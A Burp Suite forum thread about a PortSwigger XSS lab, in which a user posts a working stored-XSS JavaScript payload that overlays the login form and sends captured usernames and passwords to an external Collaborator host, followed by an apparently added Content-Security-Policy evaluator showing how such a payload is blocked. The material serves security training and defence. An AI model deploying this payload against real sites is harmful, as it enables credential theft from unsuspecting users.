Burp Suite User Forum


Lab: Exploiting cross-site scripting to capture passwords

slt | Last updated: Jul 16, 2024 02:29PM UTC

Hello! I think the description of what the simulated victim does should be updated on this lab. I used XSS to replace the current page content with the login form (after fetching it dynamically), then hook on the submit event to put the submission on hold while exfiltrating the credentials (assuming the simulated victim would try to login). It works as expected but would not solve the challenge. After looking at the solution, I'm quite disappointed! I feel my solution is way more subtle and nice and should work with the simulated victim! Or at the very least, the description could be updated! Here is the payload I used:

    <script>
    // Fetch the lab's own login page and swap its main container into the current page
    fetch(location.href.toString().replace('/post?', '/login?'))
      .then(resp => resp.text())
      .then(html => {
        const parser = new DOMParser();
        let current_container = document.querySelector('div.container.is-page');
        let doc = parser.parseFromString(html, 'text/html');
        let doc_cont = doc.querySelector('div .container.is-page');
        current_container.innerHTML = doc_cont.innerHTML;

        // Hold the submission until the credentials have been sent to the Collaborator URL
        document.forms[0].addEventListener('submit', (evt) => {
          let form = document.forms[0];
          evt.preventDefault();
          let username = form.elements.username.value,
              password = form.elements.password.value;
          fetch("https://3hlexh2r5rea50zjl8l51ycksby2msah.oastify.com/?username="
                + encodeURIComponent(username) + "&password=" + encodeURIComponent(password))
            .then()
            .catch(() => {
              console.log("exfiltrated!");
              document.forms[0].submit();
            });
        });
      })
      .catch(e => console.log(`ERROR: ${e}`));
    </script>

Thank you :-)
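From a defender's side, both halves of the payload in this post (the inline script and the cross-origin fetch to the Collaborator host) are exactly what a Content-Security-Policy is meant to stop. The following is an added example, not code from the post or from PortSwigger: a minimal evaluator for the `script-src` and `connect-src` directives, with a constructed page origin and a deliberately weak policy for comparison. It only understands `'self'`, `*`, `'unsafe-inline'` and explicit origins; wildcard hosts, nonces and hashes are out of scope.

```javascript
// Added example: minimal CSP evaluator for the two directives relevant to the
// payload above. Not part of the forum post; policy strings are constructed.

// "script-src 'self'; connect-src 'self'" -> { "script-src": ["'self'"], ... }
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Fetch directives fall back to default-src when absent, as browsers do.
// Returns null when neither is present (unrestricted).
function sourcesFor(policy, directive) {
  return policy[directive] || policy['default-src'] || null;
}

function originOf(url) {
  return new URL(url).origin;
}

// Would an inline <script> block (like the stored payload) execute?
function inlineScriptAllowed(policy) {
  const sources = sourcesFor(policy, 'script-src');
  if (sources === null) return true;
  return sources.includes("'unsafe-inline'");
}

// Would fetch(url) issued from a page at pageOrigin pass connect-src?
function connectAllowed(policy, pageOrigin, url) {
  const sources = sourcesFor(policy, 'connect-src');
  if (sources === null) return true;
  const target = originOf(url);
  return sources.some((src) => {
    if (src === '*') return true;
    if (src === "'self'") return target === pageOrigin;
    try { return originOf(src) === target; } catch { return false; } // 'none' etc.
  });
}

// Constructed policies: the strict one blocks the inline script and the
// Collaborator fetch while still allowing the same-origin /login fetch.
const STRICT_POLICY = "default-src 'self'; script-src 'self'; connect-src 'self'";
const WEAK_POLICY = "script-src 'self' 'unsafe-inline'";
```

`inlineScriptAllowed(parseCsp(STRICT_POLICY))` is `false`, and under the same policy a fetch to the Collaborator origin is refused while the same-origin `/login` fetch is still permitted.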

Ben, PortSwigger Agent | Last updated: Jul 17, 2024 09:48AM UTC

Hi, We can certainly pass your feedback on to the team. Thank you!
